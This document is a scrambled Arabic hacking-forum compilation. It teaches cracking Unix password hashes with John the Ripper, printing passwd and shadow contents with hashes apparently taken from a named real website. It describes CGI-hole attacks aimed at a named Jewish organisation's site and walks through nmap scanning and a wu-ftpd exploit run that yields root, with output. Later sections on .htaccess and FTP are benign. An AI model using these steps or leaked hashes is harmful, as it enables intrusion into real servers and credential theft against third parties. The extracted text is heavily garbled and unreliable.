root الجذر هو واللي المستخدم يوضخ السطر root هذا
x العالمة مكانها يعني ، مضلله انها ويتضح ، المرور ، x وكلمة تفكر ال
تم ثاني ملف عن البحث عليك لكن ، مستحيل فهذا كسرها فيهذا تفعل كيف قليل بعد ستعرف ، المرور كلمة فيه تخزين
0 المستخدم رقم هو هذا
1 المجموعه رقم
Super-User:/:/sbin/sh مشمهم هذا
++++++++++++++++++++++++++++الثالث الجزء
الملف - كان إذا بين كان )encryption مشفر( ماالفرق مضلل( وإذاshadowed( ؟
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~ المضلل أو * shadow file الملف مثل رمز المرور كلمة مكان x يكون
لها # ! مثال وهذا أو أوroot:x:0:1:Super-User:/:/sbin/sh
مثل مشفره ولكن مكتوبه المرور كلمة تكون المشفر الملف لكن هذه
root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh هي المشفره المرور كلمة تكون Q71KBZlvYSnVw هنا
صافيه الصوره طلعت .... اآلن
؟ - كسره يتم كيف ، مشفر المرور كلمة ملف كان لو وماذا~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ هو وأشهرها كثيره آخر john the ripper و Crack 5.0a البرامج ويوجد، jack the ripper بإسم ليونكس في العمل يجيدون ممن كنت إذا
تنزيل عليك ، جيد ، Crack 5a فهذا يريد john the ripper وأفضل لمنفإن وللمعولميه ، ويندوز تحت john the ripper إستخدام أيضا عمل
..... ليونكس
البرامج هذه عمل -: طريقهللبرنامج كما wordlist يقدم ، به الموجوده الكلمات بمطابقه ويقوم
هنا موضح . هو
------------------------------------------------------------------------------------------------ \ Q2wrtUo9LPq2R >------
/ | /---/ | { مع | // >--- { المشفره المرور كلمة البدايه مقارنه أخذ / 1يتم الـ من حتى / _____________ |0الكلمات | / wordlist كلمة المختاره
/{ 0يتم / | | --------^--------- / 1تشفير{ / \----| word list | التطابق Q6LiJ6ct1oUBz >- المختاره /---/ الكلمة مشفره مرور | | كلمة
_____________| ------------------ //--------song------ \ تطابق حدث إذاأن يعني فهذا
مشفره كانت التي المرور كلمةكسرت .. قد
مالحظه | ------------------------------------------------------------------------------- |كلمات :- لكسر األعلى في الموضحه مثل دوره عمل يتم مهمه
بسرعه المشفره المرورالثانيه 5000 | {النهايه} في تجربه john the ripperإختبرنا( معالج على
700بسرعه ( | -------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------
يسرقها أحد ال كذا عشان عليها تعبت الرسمه هذه
التالي john the ripper لتشغيل األمر دوسنكتب واجه من
john -w:wordlist passwd من wordlist حيث كبير عدد على يحتوي الذي القاموس ملف هو
الكلماتالمشفره passwd و المرور كلمات على يحتوي الذي الملف هو
معرفتها نود والتي
------------------------------------------------------------------------------------------------
Microsoft)R( Windows 98 C(Copyright Microsoft Corp 1981-1998.)
E:\Desktop\junk\john the ripper<john -w asswd passwd.txt
by Sola 97,John the Ripper Version 1.3 Copyright )c( 1996
Loaded 1 password
**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE
<E:\Desktop\junk\john the ripper ----------------------------------------------------------------------------------------------
--
الملف في النتيجه تحفظ نفس john.pot وسوف في الموجودعمليه في البدء أردت إذا الملف هذا حذف وعليك ، الدايروكتري
من بدل آخر مكان في نقله أو إسمه تغيير ويمكنك جديده كسرذلك ترى كنت إذا ... حذفه
بـ تسمى وهي للكسر اخرى طريقه بالعربي brute force هناك أولملف تحتاج ال وهي ، العنيفه ، wordlist القوه كل بتجربه تقوم هي
و خانتان بعضفي مع والرموز واألرقام واربع 3الحروف خانات ان .. افضل وأنا ، الصحيحه المرور كلمة تصيب حتى الخ وخمس
ملفات فقطألن wordlist تستخدم ثواني اال في معك يأخذ لن فذلكتجربه سرعة بأنه ذكرت باألعلى الرسم في الموضحه التجربه عمليه
يتجاوز ملفات 5000الكلمات تفلح لم إذا ، الثانيه في كلمة wordlist العنيفه القوه الى إذهب brute force حينها
يجعل التالي طريقه john the ripper األمر brute force يستخدمذكرها السابق
john -i passwd
بتجربه passwd حيث قمت إذا ، كسره المراد المرور كلمة ملف هوتوصل أين الى لترى البرنامج عمل أثناء إنتر إضغط الطريقه ... هذه
22. ؟ - أعمل ان علي ماذا ، مضلل المرور كلمة ملف كان ولو~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ تسمى طريقه هناك لكن ، مضلله مرور كلمة تواجه سوف دائما
Unshadow المشكله هذه !! لحلملف يسمى ثاني ملف عن البحث عليك ملفمضلل واجهت إذا
) الظل ) ملف shadow file الشادويوضع مكان له تشغيل نظام وكل معينه امكنه في يوجد الملف وهذا
التالي الجدول اليك ، الملف هذا : به
Linux : /etc/shadow token = * SunOS : /etc/shadow token = هو اشهرها متعدده أشكال * يأخذ
FreeBSD : /etc/master.passwd or /etc/shadow token = * هو والجديدx
IRIX : /etc/shadow token = x AIX : /etc/security/passwd token = !
ConvexOS : /etc/shadow or /etc/shadpw token = *
token الملف في يوجد الذي الرمز ، passwd تعني في يفيد وهذافهذا ! المرور كلمه بدل عالمه لقيت مثال لو يعني ، المهمه تسهيل
في مسجله المرور كلمة ان ، etc/security/passwd/ يعني لقدملف ) أكرر ملفشادو على مثال ، ذكره السابق بالجدول إستعنت) الصحيحه المرور كلمة فيه تخزن الذي الملف هو شادو
ملف shadow هذا----------------------------------------------------------------------------------------------
-- root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445::::::
sys:NP:6445:::::: adm:IyEDQ6VoRlLHM:10935::::::
#admin:9z8VMm6Ovcvsc:10935:::::: lp:NP:6445:::::: ----------------------------------------------------------------------------------------------
-- موجوده السر كلمات ان نالحظ
الباسورد ملف دمج وهي األخيره shadow مع passwd file الخطوهpasswd الكسر برامج الى ونقدمه متكامل ملف على لنحصل
ذكرها ...السابق
عليه حصلنا باسورد ملف هذا http://wilsonweb2.hwwilson.com/etc/passwd من
------------------------------------------------------------------------------------------------
root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail
Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/:
www:x:102:1001::/web:/bin/csh mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/ksh mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh
jerome:x:106:1::/home/jerome:/bin/sh
erl:x:102:1::/home/erl:/bin/sh landmark:x:1000:1000::/web/landmark:/bin/ksh
------------------------------------------------------------------------------------------------
الـ هو token ومن واللي السابق x الموضح الجدول خالل نعرفمنالدليل في الصحيحه المرور كلمة بأن etc/shadow/ ذكره
الى بالمتصفح نتوجه إذنhttp://wilsonweb2.hwwilson.com/etc/shadow
الملف على لنحصل----------------------------------------------------------------------------------------------
-- root:XOT4AiUKMRcKQ:10643:::::: daemon:NP:6445::::::
bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: smtp:NP:6445:::::: uucp:NP:6445::::::
nuucp:NP:6445:::::: listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445:::::: nobody4:NP:6445::::::
www:WJctaI.8rcSe2:10507:::::: mirrors:gg9p.5kwGw1MY:10911:::::: sid:stXldZKnujFYo:10515::::::
mirror:iMPWwbrU.gB4k:10601:::::: admin:hDhB5YYKyWgQw:10976::::::
jerome:XDqnOl32tPoGo:10976:::::: erl:0jE9Xem4aJYeI:10982:::::: landmark:0jCgWu6vl8g0s:11185::::::
------------------------------------------------------------------------------------------------
عالمه مكان ولصقها فيه الموجوده السر كلمات بنسخ في x نقوملمة ملف على لنحصل الحسابات جميع مع وهكذا ، الباسورد ملف
الكسر برامج الى ونقدمه ومتكامل كامل مرور
مهمه -: مالحظهبرامج عليها لتتعرف تربتها يعني ، سطر في حساب كل جعل عليك
... الكسر
الزياره تستحق -: مواقع
لثغرات أرشيفwww.securiteam.com/exploits/archive.html
لثغرات أرشيفhttp://www.ussrback.com/
الكثير + ثغرات أرشيفhttp://www.secureroot.com/
ثغرات أرشيف
http://www.rootshell.com/
ثغرات أرشيفhttp://www.ussrback.com/
لثغرات مواقعwww.secureroot.com/category/exploits
الهاكينق لمواقع دليلwww.hitboss.com/Hacking
عنه غني ال بحث محركhttp://www.undergroundnews.com/resou...und/search.asp
Warez.com-Undergroundhttp://www.warez.com/
Hacking ( البدايه يريد لمن )ممتاز
http://www.neworder.box.sk/
Security Search Engine http://www.bugs2k.com/
insecure http://www.insecure.org/
>/XMP<>/BODY<>/HTML<
http://public.www.easynet.co.uk/cgi...ail/formmail.pl
،،،انتهى
" ) الثالث ) الجزء المواقع " اختراق
> اإللكتروني الجهاد موقع من >منقول
صنع ... من النه جدا جدا وبسيط جدا كبير االختراق عالم اخواني البشر
عن االختراق باب في وجديد المنتدى هذا في االعضاء احد كونيالثغرات طريق
طلب .. فليسعيبا بعض من ونتعلم للجميع الفائده تحصل وحتى العلم
بل العلماء لنجابه ال نتعلم نحن بالعلم والتعالي الجهل العيب انما
يعاديها من وجه ونقففي رايتها ونرفع امتنا ..... لننفع
بس عنه قريت انا ما مثل جدا بسيط الثغرات موضوع الحقيقه في
االخوان لعل بعضاالسئله ساطرح انا جهد وشوية متابعه يبي المشرفين
الموضوع في يساعدونا الكتاب .... او
لي تبين قدامتها رغم الثغرات تكست من للعديد قرائتي خالل منامور عدة
الموقع * تخترق تمتلك )host( لن حتى السيرفر مستضيفه الليطبيعي شيء وهذا والباسوور اليوزر
الصالحيات * ملف تمتلك حتى السيرفر تخترق هو )passwd( لن الليالمستأجره للمواقع الحسابات حق
مجلد تحت واقع الملف ان محيرني اللي بسسؤالي السيرفر عندتيسي اي /etc/passwd اسمه
اسمه يكون اكساو shadow احيان او نجمه المرور كلمة ان ويعنياما تعجب فيه passwd عالمة فتأتي
لها وتستخدم مشفره تشفيرها john the ripper الكلمه يفك الليللحين امل مالك الشادو ملفات طبعا
؟؟؟ لها برنامج مافيه علمي حسب على
ذا بسليشالملف امتداد له ملف كل ان نعرفه اللي هنا سؤال فيه؟ امتداد ماله
يحفظ هل احفظه صيغه باي ؟؟ كانت طريقه باي الملف حصلت واذاام ( )pwd( كتكست ؟ ) صيغه اي او
اليونكس مجلدات الملفمن فيه اللي المجلد ثاني سؤال فيه بعديناليونكس ان معروف كما النه ؟
مجلدات ست له
bin النظام تشغل اللي يعني الثنائيه بالملفات خاصetc مدير حساب هو اللي الرووت ظمنها ومن النظام ادارة ملفات
او passwd النظامdev االجهزه ملفات
lib التشغيل في النظام تساعد اللي الديناميكي الربط مكتباتtmp الثابته غير او الموقته الملفات
usr بالنظام حسابت لهم اللي السر وكلمات المستخدمين اسماء
نظام فيه السيرفر ان لو ذلك يعني ؟ nt هل منه الملف انزل اقدرباليونكس اللي نفسها المجلدات وان
في موجوده اللي يختلف nt زي الملف واسم تختلف admin.pwd ام مثال
السابقه * للملفات للوصول الطرق تعني الثغرات لطريقة بالنسبهاخرى ملفات او
للمجلد نسبة اي جي السي ثغرات اشهرها ملفات cgi-bin ومن اوامتداد cgi من
؟؟؟ ليشسموها ماعلينا
لنفترض شديده ببساطه والموقع الثغره مع نتعامل وشلون طيبثغره لدينا ونريد php.cgiان
مستضاف مو يعني نيم دومين ذو موقع على تطبيقها /http://www.jewish.org مثال التالي نفعل
http://www.jewish.org/ نكتب الثغره /cgi-bin ثم بحيث php.cgi ثمتجميعها بعد الخطوات تصبح
http://www.jewish.org/cgi-bin/php.cgi في كله هذا الكالمحقل في المستعرضعندك
العنوان االدرس
الموضوع على يعلق من لعل منها متأكد ماني حاجه اقول نسيت انايصححها صحيحه غير كانت ان
اسمه ثاني بمجلد الثغره تكون ممكن الثغره scripts ان وتصبح السابقه
http://www.jewish.org/scripts/php.cgi
scripts فيها winnt خاصبسيرفرات
cgi-bin لينكس ايريساو يونيكساو خاصبسيرفرات
جهة من التنفيذبه الملفات فيها توضع السابقه المجلدات للمعلوميهجافا االبلت مثل السيرفر
في تطلع اللي مثل جهازك على تنفذ جافا السكربت ملفات اما.المستعرض
،،،انتهى
" ) متوسط ) المواقع اختراق " درسفي
>منقول<> ICER :الكاتب<
تجد : ... سوف جوجل في بحثت اذا اكاونت شيل المطلوبه االدواتالشيلز من الكثير
) تعيش ) يونيكسو لينكساو بتركب احمممم المحترمه الناس طبعاتريح و حياتها
كويسلها... اكاونت اللينكسفالشيل ماتحبش تانيه ناس في نفسهايمشي ممكن و
االتنين مشحاستعمل نفسي عن انابالبرامج بيسمح انه يتاكدو الزم الشيل حيستعملو للي بالنسبه بس
زي االساسيهnslookup, host, dig, ping, traceroute,telnet, ssh, ftp
ال الزم اساسي ...) gcc و ركب عم يا كومبايل تعمل تعرف عشاننفسك ( ريح لينكسو
دي االدوات طبعا االكسبلويت nmap and netcat و هي حاجه اخر . و* الهامه الملحوظات : بعض
1- و االوامر في اختالف بالدوسمع جدا شبيه اكاونت الشيلمشحناقشكيفيه .. الوظائف
عليه اتكلمت كثيره مواضيع فيه الن واحد على .الحصولال -2 متقدم nmap اداه سكانر بورت عن عباره هي
لسيرفير NetCat ال -3 بيانات برفع تقوم و بالتلنت شبيه اداه هيمعين
4- السي بلغه مكتوبه تكون غالبا برامج عن عباره هي االكسبلويتاتتقوم هي و
كل بعمل تقوم و معين جهاز تخترق فهي الصالحيات كافه باعطائكتريده انت شيء
فين؟؟؟ تالقيها ممكن
... و مالقيتشقولي لو و دور يشيل من افه على السيكيوريتي مواقعموقع كام اديلك انا
دي الحاجات منه ....تجيب* بالموضوع المرتبطه : المواقع
a( Linux )http://www.slackware.com(b( Nmap )http://www.insecure.org(
c( NetCat )http://www.l0pht.com/~weld/netcat/(
-: الخطواتخشعالنت -1 الينكسو ( ركب من مفيشاحسن مشقلتلك
) P: اللينكساالداه -2 التالي nmap ركب : متبعا
*1( tar zxvf nmap.tar.gz2( cd nmap
3( ./configure && make && make install
3- ليكن و المستهدف الموقع .. شوفwww.target.com
باستخدام -4 الموقع تبع بي االي شوف
nslookup www.target.com
ليكن و للموقع بي االي يعرضلك سوف 196.1.2.3هذانظام -5 شوف كمان و الموقع بيقدمها اللي الخدمات شوف
التالي متبعا -: التشغيل
"nmap -sS -O 196.1.2.3"
ده الكالم شبه مخرجات يديك انه -: المفروضroot@IcEr:~# nmap -sS -O 196.1.2.3
Starting nmap V. 2.54BETA22 ) www.insecure.org/nmap/ (Interesting ports on www.target.com )196.1.2.3(:
)The 1531 ports scanned but not shown below are in state: closed(
Port State Service21/tcp open ftp
25/tcp open smtp80/tcp open http
111/tcp open sunrpc113/tcp open auth
515/tcp open printer963/tcp open unknown
1024/tcp open kdm4444/tcp filtered krb524
6000/tcp open X116699/tcp filtered napster
OS guess for host: Linux 2.2.14-2.2.16Uptime 0.160 days )since Mon Apr 30 14:51:06 2001(
Nmap run completed -- 1 IP address )1 host up( scanned in 67 seconds
root@IcEr:~#
شباب يا كده تمام...نكمل
البورتات يوريك للموقع استكشاف عن عباره كله ده الكالمفيه.. كان لو تشوف ممكن FTP daemon المفتوحه
ده و موجود حنالقيه فوق اللي المثال في ال ال و الموقع على شغالكويس
من فيرحين اي التالي FTP daemon شوف متبعا -: موجوده"telnet 196.1.2.3 21"
او"ftp 196.1.2.3"
اللي ديمون بي تي االف بتاعه الفيرجين فيه بانر حيديك منهم ايالسيرفير على شغاله
كده زي يكون : ممكن
root@IcEr:~# ftp 196.1.2.3Connected to 196.1.2.3.
220 www.target.com FTP server )Version wu-2.6.0)1( Mon Mar 6 13:54:16 SAST 2000(
ready.Name )target:root(: anonymous
331 Guest login ok, send your complete e-mail address as password.Password:
230-Welcome, archive user! This is an experimental FTP server. If have any
230-unusual problems, please report them via e-mail to [email protected]
230-If you do have problems, please try using a dash )-( as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.230-
230 Guest login ok, access restrictions apply.Remote system type is UNIX.
Using binary mode to transfer files.ftp<by
root@IcEr:~#
هي الموجوده الفيرجين ان تعرف تقدر ده الكالم .wu-2.6.0 مننخشكمجهولين حاولنا احنا ايضا اعمليه anonymous و كانت و
); ناجحهالمختار ####### الحبيب على ####### صلي
خطوه 8او 7 اهم انها المهم مشفاكر :-
من ديه الفيرجين بتاعه االكسبلويت على .FTPd احصل) سيرشميتوهش يعمل ) اللي
لتكن wuftpd2600.c وعشان متكوده انها حتالقي بتاعها السورسكود شفت لو المهم
ليكن و معين تشغيل red hat 6.2 نظامده التشغيل نظام على بيعمل المستهدف الموقع كان لو سالم يا و
بشغلها و دي للثغره كومبايل تعمل انك تعمله اللي كل يبقى كدهسيرفر على
حيديك كده و المستهدف root access الموقع;-(
root@IcEr:~/# ./wuftpd2600 -t -s 0 196.1.2.3Target: 196.1.2.3 )ftp/>shellcode<(: RedHat 6.2 )?( with wuftpd
2.6.0)1( from rpmReturn Address: 0x08075844, AddrRetAddr: 0xbfffb028,
Shellcode: 152loggin into system..
USER ftp331 Guest login ok, send your complete e-mail address as
password.PASS >shellcode<
230-Next time please use your e-mail address as your password230- for example: [email protected]
230 Guest login ok, access restrictions apply.STEP 2 : Skipping, magic number already exists:
[87,01:03,02:01,01:02,04]STEP 3 : Checking if we can reach our return address by format
stringSTEP 4 : Ptr address test: 0xbfffb028 )if it is not 0xbfffb028 ^C me
now(STEP 5 : Sending code.. this will take about 10 seconds.
Press ^\ to leave shellLinux lame_box.za.net 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000
i686 unknownuid=0)root( gid=0)root( egid=50)ftp( groups=50)ftp(
Bang! You have root!
ده .. االمر شوف الكومبايل امر نسيت انا طبعاman gcc
الخيارات .. بكل الكومبايل امر عن كامله معلومات حيديلك هوه ومعاه اللي
عليه اللي عملت كده انا يبقى كدهايه اعمل ايسر يا ياواد يقولي و كده بعد باه محدشيسالني
search..U will find what U wannaبعض ... .. .. كده بعد كات بالنت اعمل محدشسالني نسيت اه طيب
بتحتاجه ..الثغراتال خاصيه استغلينا اننا الحظت لو .. annonymous لو الكن الموجوده
الخاصيه كانتده .. الكالم نكمل مشحنعرف يبقى مشموجوده دي
االكسبلويتمش .. الحاله هذه في مشتشتغل االكسبلويت عشان
نيم يوزر و باسورد معانا لو اال تشتغلالموقع بتاع بي تي االف نخشعلى ..عشان
.. اكسبلويت كل و االكسبلويت بتاع السورس تقرا الزم كده عشانشغل ساينتكسو لها
.. احده و االساسيه المبادئ بس بيها .خاص
،،،انتهى
ملف " " htaccess شرح
>منقول<> BSD-r00t :الكاتب<
| مقدمـــة * |ملف * | | htaccess. اهمية
ملف * | عمل | htaccess. كيفيةصفحات * | | خاصة error عمل
به * | يوجد ال الذي المجلد عرضمحتويات | index منعالشخاصمعينة/ * | الموقع دخول اتاحة | منع
اخر * | للينك لينك فتح يحاول من | تحويلالملف * | | .htpasswd عمل
| * بواسطه | htaccess. الحمايةالملف * | اظهار | htaccess. منع
الملف * | في مستخدمين | اضافةاخر * | بامتداد تظهر الصفحات | جعل--------------------------------------------------
مقدمـــة *------------
سر , بكلمة فيه بعضاالجزاء اغالق و المواقع حماية وسائل اهم منالسماح و الموقع دخل الناسمن بعض منع و
الملف .. استخدام هو بالدخول عمل htaccess. لغيرهم يمكن الذي وبه الكثير و . الكثير
سر بكلمة محمي و الملفمخفي هذا و
ملف * htaccess. اهمية-----------------------
سر -1 بكملة فيه جزء اي حمايةصفحات -2 بك error عمل خاصة
به -3 يوجد ال الذي المجلد عرضمحتويات index منعالشخاصمعينة/ -4 الموقع دخول اتاحة منع
غير -5 بأمتدادات البداية صفحة .. html , .asp. جعلاخر -6 للينك لينك فتح يحاول من تحويل
ملف * عمل htaccess. كيفية---------------------------
باد النوت نصوصمثل محرر اي بواسطه الملف هذا عمل يمكنك
"Notepad" نحفظ و باسم للملفحفظ عمل طريق عناالسم بهذا ليسامتداده htacces. الملف يكون ان ان txt. على اي
ذلك , تستطيع لم اذا للملف اسم ليسهناكباسم الملف الملف - "htaccess." احفظ اسم التنصيصفي عالمتي
- .
صفحات * خاصة error عمل------------------------
محاولة عند انه كما افضل بشكل يظهر الموقع ان هو منها الفائدة وكان يظهر سوف الموقع على سكان ايشخصعمل
يقوم انه هي السكانر عمل طريقة الن ذلك و الثغرات كل به الموقعالنتيجه يرصد و الموقع على ثغره كل بتطبيق
الثغره هذه عليه الموقع كأن لك يظهر تغير اي هناك كان . فاذاال صفحات عمل يمكنك طريق error و عن ك -: الخاصه
ال- صفحات تصميم اوال error أالموقع- على الصفحات تحميل ب
الملف- في التابي السطر اضافه htaccess. جErrorDocument error_num directory_file
يكون و " " error_num بخيث بالسفل موجود االرقام الخطا رقم هوdirectory_file ال صفحه مكان التي error هو
بتصميمها . قمتErrorDocument 404 /errors/nfound.html : مثال
ارقامها errors ال - : و
-----------------------| 400 | Bad Syntax |
-----------------------| 401 | Unauthorized |
-----------------------| 402 | Not Used |-----------------------
| 403 | Forbidden |-----------------------
| 404 | Not Found |-----------------------
به * يوجد ال الذي المجلد عرضمحتويات index منع-----------------------------------------------
ملف به يكون ال و عليها دليل اي فتح محاولة عند المواقع بعضindex الدليل هذا محتويات جميع بسرد الموقع يقوم
طريقتين توجد المشكله هذه لحل -: وملف- وضع جدا " index أ صعب هذا بالطبع و المجلدات كل " فيالملف- باستخدام في htaccess. ب التالي السطر اضافه طريق عن
-: الملفOptions -Indexes
الشخاصمعينة/ * الموقع دخول اتاحة منع
-------------------------------------الملف باستخدام دخول htaccess. يمكنك من شخصمعين منع
االتسفاده يمكنك و به الخاصه بي االي معرفة بعد الموقعمنع يمكنك كما تريد ال لمن الموقع دخل منع يمكنك حيث ذلك من
مثال اسرائيل اليشخصفي الموقع .. دخولالملف في التالي السطر اضافة طريق عن ذلك يمكنك - : و
???.???.???.??? deny from . . . به الخاص بي االي هو ؟؟؟ ؟؟؟ ؟؟؟ ؟؟؟ ان . حيث
السطر اضافة يمكنك الموقع دخول من احد اي منع اردت واذا -: التالي
deny from allباضافة ذلك يمكنك الموقع بدخول لشخصمعين السماح اردت واذا
التالي -: السطر. . ؟؟؟. ؟؟؟ ؟؟؟ allow from ؟؟؟
. . . به الخاص بي االي هو ؟؟؟ ؟؟؟ ؟؟؟ ؟؟؟ انا حيث
اخر * للينك لينك فتح يحاول من تحويل-------------------------------------
ب العمليه هذه فوائد Redirection وتسمى اهم من htaccess. وهيقديم ملف موقع تغير عند مثال تستخدم الملف
الملف باستخدام فيمكنك جديد مكان الى الموقع htaccess. علىتوجيه القديم الينك احد فتح احد محاولة عند
الملف في التالي السطر اضافة طريق عن الجديد الينك -: الى???.???/Redirect
/somewhere/???.??? http://www.site.com/newlocation يكون القديم ???.???/somewhere/ بحيث الملف مكان هو
???.???/http://www.site.com/newlocation و مكان هوالجديد .الملف
----------
الملف * .htpasswd عمل------------------------
الملف بنفسطريقة بعمله تقوم نعمله , htaccess. ويمكنك سوف والملف استخدام نسطيع htaccess. تى
الملف في نكتب سوف و الحماية يأتي htpasswd في -: ماuser1:EncryptedPwd1user2:EncryptedPwd2
o ان المستخدم user1 , user2 حيث اسم . هوo و EncryptedPwd1 , EncryptedPwd2 ولكن السر كلمات هي
تريدها كلمة اي تشفير يمكنك و مشفرهالموقع طريق عن
http://www.euronet.nl/~arnow/htpasswdاو
http://www.e2.u-net.com/htaccess/make.htmباسم يوسر وضع اردنا لو به Security فمثال الخاصة السر كلمة و
الموقع fu93hds3 هي الى اوال نذهبhttp://www.euronet.nl/~arnow/htpasswd
o و username : Security o و passwrod & re-enter password : fu93hds3
o الزر على نضغط النتيجه claculate و >-- لتظهرSecurity:893bNicBcwszw
الملف عمل اتممنا قد االن ذلك htaccess. و و بعمله قمنا الذي والملف استخدام نستطيع htaccess. لكي
يوسر و سر بكلمة . للحمايةبواسطه * htaccess. الحماية
----------------------------من احد اي منع يمكن انه حيث للملف الرئيسية الفائدة تعتبر و
معه كان اذا اال الموقع في معين دليل دخولخاص , منتدى عمل طريقها عن فيمنكنك نيم اليوسر و السر كلمة
تريد شئ اي .اوالملف وضع هذا htaccess. فعند دخول احد حاول و دليل اي في
منه يطلب سوف تحته يندرج جزء اي او الدليليوسر و سر . كلمة
نسخه قبل الملف في يأتي ما اضافة طريق عن ذلك عمل يمكنك وحمايته المراد الدليل --: في
AuthUserFile /somewhere/.htpasswd"AuthName "Enter your user and passed please
Require valid-userAuthType Basic
>Limit GET POST<require valid-user
>/Limit<o يكون ملف /somewhere/.htpasswd بحيث مكان htpasswd. هو
موقعك علىo يكون التي Enter your user and passed please و الرساله هي
السر كلمة لتطلب تظهر سوف
الملف * اظهار htaccess. منع-----------------------------
نحميه ان علينا فيجب كبيره اهميه الملف لهذا ان االن عرفنا قداال , الملفمخفي ان من فالبرغم جيدا
هناك انه او مؤمن غير نفسه السرفر يكون ان من سالم غير انهخطأ .. تصريح
يأتي ما اضافة طريق الملفعن عرضهذا نمنع سوف - : لذلك
>Files .htaccess<order allow,deny
deny from all>/Files<
له يظهر الملفسوف عرض احد حاول . error 403 فاذا
اخر * بامتداد تظهر الصفحات جعل-------------------------------
امتداده كأن يظهر ملف عمل الخاصية هذه باستخدام و html. ويمكنامتداد ذو . مثال txt. لكنهالتالي السطر -: باضاف
AddType text/plain htmlالملف هذا في عملها يمكنك التي التغيرات كافى رؤية -: ويمكنك
http://www.pharaonics.net/books/MIME.txt
،،،انتهى
الملفات " نقل " FTP نظام
> إعصار منتدى من >منقول> الجوكر: >الكاتب
الملفات نقل هو ؟ FTP ما
FTP لكلمة اختصار نقل File Transfer Protocol هي بروتوكول وتعنيتسهيالت احدى هي الخدمة وهذه من TCP/IP الملفات، تجعل التي
ميزات ومن الشبكة على الكمبيوترات بين الملفات نقل الممكنFTP بطريقة النصية الملفات شكل بترجمة تقوم أنها الرائعة
وعليه مختلفة تشغيل نظم تحتوي الكمبيوترات أن حيث أتوماتيكيةأشكال تحتاج Formats فلديها فبالتالي النصية للملفات مختلفة
به ماتقوم وهو لبضع ,FTP لترجمة نحتاج فاننا الملفات نقل وبخدمةجهازنا الى أميركا في ملفا ننقل كي الفأرة على . نقرات
الملفات نقل :أقسام
قسمين الى ينقسم الملفات :نقل
الملفات :Download تنزيل
المضيف الكمبيوتر من الملفات جلب المحلي Host وهو الجهاز الىLocal.
الملفات :Uplaod ارسال
المحلي الكمبيوتر من الملفات ارسال الكمبيوتر Local وهو الى.Host المضيف
الملفات لنقل نوعان فهناك األمنية الناحية :ومن
مؤمن :Secure FTP نقل
وتحصل النظام الى للدخول مرور وكلمة مستخدم اسم الى تحتاجالمضيف النظام مدير من .عليه
مجهول :Anonymous FTP نقل
غالبا وتستطيع للدخول مرور وكلمة مستخدم اسم الى التحتاجعنهما anonymous أو guest استخدام .عوضا
أقسام ثالثة الى االنترنت على البرامج :تصنفمصادر
عامة :Public Domain ملكية
ألحد ملكية حقوق فليسهناك العام لالستخدام هنا البرامج وضعتوتعديلها وتوزيعها استخدامها على قيود .وال
مجانية :Freeware مصادر
حقوق هناك ولكن توزيعها أو البرامج هذه استخدام للجميع يحقبيعها أو تعديلها يجوز وال ونشر .ملكية
مشتركة :Shareware مصادر
التتضمن وقد الشراء قبل التجربة بغرض البرامج هذه توزيع يتممدتها انتهاء بعد النسخ تحطيم ويجب المميزات .جميع
FTP الفيروسات : و
قسمين الى تنقسم والبرامج الملفات أن البداية في تعلم أن يجب
ASCII:
لـ )American Standard Code for Information Interchange(اختصاراجزيئات سبعة على تحتوي النوع هذا من تتراوح bits والملفات
و الصفر بين عن. 127قيمتها للتعبير المصطلح هذا ويستخدم . الكمبيوتر في أرقام الى األحرف بتحويل يقوم الذي المعيار
الصيغ من النوع هذا النصية الملفات .وتستخدم
Binary:
جزيئات ثمانية على وتحتوي الثنائي النظام ذات الملفات وتعنيbits و الصفر بين والملفات 255تتراوح والبرامج الصور وتندرج
النوع هذا تحت .المضغوطة
ملفات عبر تنتقل أن يمكن ال أن ASCII والفيروسات اليمكن كماكصيغ الصور عبر امتدادات jpg & gif & bmp تنتقل من وغيرها
مثل والصوت الفيديو ملفات عبر وال - avi - ram - mpg - mp3 الصور
wav النظام وملفات البرامج عبر تنتقل فانها آخر وبمعنى وغيرها،ماتكون وعادة المضغوطة والبرامج - exe - com - bat - dll :والتشغيل
drv - sys - bin - ovl - zip - mim - uue - xxe - b64 - bhx ، أن يمكن كماتطبيقات عبر الماكرو فيروسات MS Office تنتقل ، من احذر لذلك
تشغيلها قبل دائما وافحصها الملفات .هذه
الملفات نقل : FTP طريقة
وهي الملفات لنقل عديدة طرق :هناك
نظام باستخدام الملفات UNIX نقل
أوامر بعض وهاهنا أوامر استخدام عادة العملية هذه :UNIX تتطلب
ascii: ملفات الحاجة ASCII لنقل ثم الوضع هذا تغيير وعند النصية،األمر اعادة فيجب النوع هذا من ملفات .لنقل
binary: الحاجة ثم الوضع هذا تغيير وعند الثنائية، الملفات لنقلاألمر اعادة فيجب النوع هذا من ملفات .لنقل
status: نوع من هو هل ومعرفة الملف .Binary أو ASCII لفحص
help: بأوامر قائمة .UNIX لعرض
dir: الدليل عرضمحتويات
ls: الحالي الدليل .عرضمحتويات
cd directory: الدليل .تغيير
get filename: جهازك على وانزاله المطلوب الملف .جلب
